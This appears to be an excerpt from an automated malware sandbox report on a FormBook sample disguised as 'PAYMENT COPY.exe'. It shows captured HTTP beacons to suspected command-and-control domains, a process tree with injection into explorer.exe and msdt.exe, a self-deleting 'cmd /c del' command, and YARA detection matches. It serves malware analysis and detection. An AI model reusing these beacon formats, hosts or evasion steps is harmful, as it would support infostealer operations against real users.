                                                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 77 70 6b 52 65 70 6f 72 74 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 67 6c 6f 62 61 6c 65 72 72 6f 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 67 2e 61 6c 69 63 64 6e 2e 63 6f 6d 2f 77 6f 6f 64 70 65 63 6b 65 72 78 2f 6a 73 73 64 6b 2f 70 6c 75 67 69 6e 73 2f 70 65 72 66 6f 72 6d 61 6e 63 65 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 74 72 75 65 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 26 26 28 77 69 6e 64 6f 77 2e 77 70 6b 3d 6e 65 77 20 77 69 6e 64 6f 77 2e 77 70 6b 52 65 70 6f 72 74 65 72 28 7b 62 69 64 3a 22 62 65 72 67 2d 64 6f 77 6e 6c 6f 61 64 22 2c 72 65 6c 3a 22 32 2e 31 39 2e 30 22 2c 73 61 6d 70 6c 65 52 61 74 65 3a 31 2c 70 6c 75 67 69 6e 73 3a 5b 5b 77 69 6e 64 6f 77 2e 77 70 6b 67 6c 6f 62 61 6c 65 72 72 6f 72 50 6c 75 67 69 6e 2c 7b 6a 73 45 72 72 3a 21 30 2c 6a 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 2c 72 65 73 45 72 72 3a 21 30 2c 72 65 73 45 72 72 53 61 6d 70 6c 65 52 61 74 65 3a 31 7d 5d 2c 5b 77 69 6e 64 6f 77 2e 77 70 6b 70 65 72 66 6f 72 6d 61 6e 63 65 50 6c 75 67 69 6e 2c 7b 65 6e 61 62 6c 65 3a 21 30 2c 73 61 6d 70 6c 65 52 61 74 65 3a 2e 35 7d 5d 5d 7d 29 2c 77 69 6e 64 6f 77 2e 77 70 6b 2e 69 6e 73 74 61 6c 6c 28 29 29 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 6c 6f 61 64 42 61 69 64 75 48 6d 74 28 74 29 7b 76 61 72 20 6f 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 6f 2e 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 22 2b 74 3b 76 61 72 20 65 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6f 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 62 61 69 64 75 50 75 73 68 28 74 2c 6f 2c 65 29 7b 77 69 6e 64 6f 77 2e 5f 68 6d 74 2e 70 75 73 68 28 5b 22 5f 74 72 61 63 6b 45 76 65 6e 74 22 2c 74 2c 6f 2c 65 5d 29 7d 63 6f 6e 73 6f 6c 65 2e 6c 6f 67 28 22 e5 8a a0 e8 bd bd e7 99 be e5 ba a6
                                                                Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/globalerror.js" crossorigin="true"></script><script src="https://g.alicdn.com/woodpeckerx/jssdk/plugins/performance.js" crossorigin="true"></script><script>window.wpkReporter&&(window.wpk=new window.wpkReporter({bid:"berg-download",rel:"2.19.0",sampleRate:1,plugins:[[window.wpkglobalerrorPlugin,{jsErr:!0,jsErrSampleRate:1,resErr:!0,resErrSampleRate:1}],[window.wpkperformancePlugin,{enable:!0,sampleRate:.5}]]}),window.wpk.install())</script><script>function loadBaiduHmt(t){var o=document.createElement("script");o.src="https://hm.baidu.com/hm.js?"+t;var e=document.getElementsByTagName("script")[0];e.parentNode.insertBefore(o,e)}function baiduPush(t,o,e){window._hmt.push(["_trackEvent",t,o,e])}console.log("


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                5192.168.2.64974623.225.41.9280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:11.507055998 CEST5426OUTGET /eqas/?Kzrx=+pdiEsaPT2Qcmu2ts2xxLdHpIsIAjIekwLbYEBSMYRvbotqJwTsf/hFk1ceM/lb+HZzWB3Gpcg==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.35efb510815e.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:11.701028109 CEST5426INHTTP/1.1 302 Moved Temporarily
                                                                Server: openresty/1.19.3.1
                                                                Date: Mon, 12 Apr 2021 07:46:11 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 151
                                                                Connection: close
                                                                Location: https://www.8dq98.com/enter/index.html
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 31 39 2e 33 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>openresty/1.19.3.1</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                6192.168.2.64975214.129.120.3280C:\Windows\explorer.exe
                                                                TimestampkBytes transferredDirectionData
                                                                Apr 12, 2021 09:46:27.541057110 CEST5462OUTGET /eqas/?Kzrx=vogt4SdM7257j7Tk1uEKvDVNcysLCgoPP/omvU9RbfjhJlgcGqamOKpa157N0oGBpfPcf/L32A==&4h3=vZRDNDdpalAdz8 HTTP/1.1
                                                                Host: www.beyoncos.com
                                                                Connection: close
                                                                Data Raw: 00 00 00 00 00 00 00
                                                                Data Ascii:
                                                                Apr 12, 2021 09:46:28.299175024 CEST5471INHTTP/1.1 404 Not Found
                                                                Server: httpv2(13.12)
                                                                Date: Mon, 12 Apr 2021 07:46:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                Data Raw: 34 36 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 0a 3a 3a 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 3a 3a 2d 6d 6f 7a 2d 73 65 6c 65 63 74 69 6f 6e 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 45 31 33 33 30 30 3b 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 20 7d 0a 0a 62 6f 64 79 20 7b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 6d 61 72 67 69 6e 3a 20 34 30 70 78 3b 0a 09 66 6f 6e 74 3a 20 31 33 70 78 2f 32 30 70 78 20 6e 6f 72 6d 61 6c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 63 6f 6c 6f 72 3a 20 23 34 46 35 31 35 35 3b 0a 7d 0a 0a 61 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 33 33 39 39 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 7d 0a 0a 68 31 20 7b 0a 09 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 09 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 39 70 78 3b 0a 09 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 6e 6f 72 6d 61 6c 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 34 70 78 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 0a 7d 0a 0a 63 6f 64 65 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 43 6f 6e 73 6f 6c 61 73 2c 20 4d 6f 6e 61 63 6f 2c 20 43 6f 75 72 69 65 72 20 4e 65 77 2c 20 43 6f 75 72 69 65 72 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 0a 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 39 66 39 66 39 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 63 6f 6c 6f 72 3a 20 23 30 30 32 31 36 36 3b 0a 09 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 6d 61 72 67 69 6e 3a 20 31 34 70 78 20 30 20 31 34 70 78 20 30 3b 0a 09 70 61 64 64 69 6e 67 3a 20 31 32 70 78 20 31 30 70 78 20 31 32 70 78 20 31 30 70 78 3b 0a 7d 0a 0a 23 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 09 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 44 30 44 30 44 30 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 30 20 38 70 78 20 23 44 30 44 30 44 30 3b 0a 7d 0a 0a 70 20 7b 0a 09 6d 61 72 67 69 6e 3a 20 31 32 70 78 20 31 35 70 78 20 31 32 70 78 20 31 35 70 78 3b 0a 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 3c 68 31 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 09 09 3c 70 3e 54 68 65 20 70 61 67 65 20 79 6f 75 20 72 65 71 75 65 73 74 65 64 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 09 3c 2f 64 69 76 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 46b<!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>404 Page Not Found</title><style type="text/css">::selection { background-color: #E13300; color: white; }::-moz-selection { background-color: #E13300; color: white; }body {background-color: #fff;margin: 40px;font: 13px/20px normal Helvetica, Arial, sans-serif;color: #4F5155;}a {color: #003399;background-color: transparent;font-weight: normal;}h1 {color: #444;background-color: transparent;border-bottom: 1px solid #D0D0D0;font-size: 19px;font-weight: normal;margin: 0 0 14px 0;padding: 14px 15px 10px 15px;}code {font-family: Consolas, Monaco, Courier New, Courier, monospace;font-size: 12px;background-color: #f9f9f9;border: 1px solid #D0D0D0;color: #002166;display: block;margin: 14px 0 14px 0;padding: 12px 10px 12px 10px;}#container {margin: 10px;border: 1px solid #D0D0D0;box-shadow: 0 0 8px #D0D0D0;}p {margin: 12px 15px 12px 15px;}</style></head><body><div id="container"><h1>404 Page Not Found</h1><p>The page you requested was not found.</p></div></body></html>0


                                                                Code Manipulations

                                                                Statistics

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                Analysis Process: PAYMENT COPY.exe PID: 6544 Parent PID: 6004

                                                                General

                                                                Start time:09:44:46
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.341537676.0000000002650000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                Analysis Process: PAYMENT COPY.exe PID: 6592 Parent PID: 6544

                                                                General

                                                                Start time:09:44:47
                                                                Start date:12/04/2021
                                                                Path:C:\Users\user\Desktop\PAYMENT COPY.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x400000
                                                                File size:206697 bytes
                                                                MD5 hash:0CDBFDF044CFA1D810ED06B745AC9CD9
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.378818035.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379005544.00000000005C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000001.335966959.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.379053655.00000000005F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:low

                                                                Analysis Process: explorer.exe PID: 3440 Parent PID: 6592

                                                                General

                                                                Start time:09:44:52
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\explorer.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:
                                                                Imagebase:0x7ff6f22f0000
                                                                File size:3933184 bytes
                                                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: msdt.exe PID: 6808 Parent PID: 3440

                                                                General

                                                                Start time:09:45:07
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\msdt.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\SysWOW64\msdt.exe
                                                                Imagebase:0xff0000
                                                                File size:1508352 bytes
                                                                MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Yara matches:
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593833338.0000000000F20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593897899.0000000000F50000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Joe Security
                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                Reputation:moderate

                                                                Analysis Process: cmd.exe PID: 6856 Parent PID: 6808

                                                                General

                                                                Start time:09:45:11
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:/c del 'C:\Users\user\Desktop\PAYMENT COPY.exe'
                                                                Imagebase:0x2a0000
                                                                File size:232960 bytes
                                                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Analysis Process: conhost.exe PID: 6864 Parent PID: 6856

                                                                General

                                                                Start time:09:45:12
                                                                Start date:12/04/2021
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff61de10000
                                                                File size:625664 bytes
                                                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high

                                                                Disassembly

                                                                Code Analysis

                                                                Reset < >